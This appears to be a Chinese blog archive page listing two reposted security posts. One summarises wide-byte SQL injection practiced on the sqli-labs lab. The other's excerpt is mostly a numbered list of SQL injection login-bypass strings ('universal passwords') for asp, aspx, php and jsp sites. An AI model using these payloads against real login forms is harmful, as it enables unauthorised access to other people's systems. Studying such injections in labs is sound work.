07 2022 档案

MySQL宽字节注入分析(转)
摘要:作者 Zgao 在漏洞复现 最近在研究php代码审计,恰好又看到了宽字节注入,虽然这个在很早之前就了解过,但是由于一直都没有机会尝试过这个注入,所以就利用sqli-labs来重新来研究一下。这里就用的是第33题,GET – Bypass AddSlashes()。 因为大多数的网站对于SQL注入都做 阅读全文
posted @ 2022-07-07 17:52 小白不太黑 阅读(284) 评论(0) 推荐(0)
asp、aspx、php、jsp万能密码大全(转自网上)
摘要:asp 'or'='or' aspx 1: "or "a"="a 2: ')or('a'='a 3:or 1=1-- 4:'or 1=1-- 5:a'or' 1=1-- 6: "or 1=1-- 7:'or'a'='a 8: "or"="a'='a 9:'or''=' 10:'or'='or' 11 阅读全文
posted @ 2022-07-07 16:38 小白不太黑 阅读(1312) 评论(0) 推荐(0)